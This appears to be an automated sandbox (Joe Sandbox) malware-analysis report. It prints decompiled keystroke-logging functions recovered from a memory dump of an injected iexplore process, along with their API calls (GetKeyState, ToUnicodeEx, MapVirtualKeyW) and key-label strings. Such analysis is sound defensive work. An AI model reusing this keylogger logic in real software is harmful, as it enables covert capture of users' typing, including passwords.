Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Pause], xrefs: 00C85D37
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C858A0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858A0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad *]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Numpad *], xrefs: 00C858A2
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C7A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C7A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Media]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Media], xrefs: 00C85C7C
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B9D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B9D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F23]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F23], xrefs: 00C85B9F
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D92, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D92(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Scrol Lock]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Scrol Lock], xrefs: 00C85D94

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B37, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B37(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F18]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F18], xrefs: 00C85B39

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85BD0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BD0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F4]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

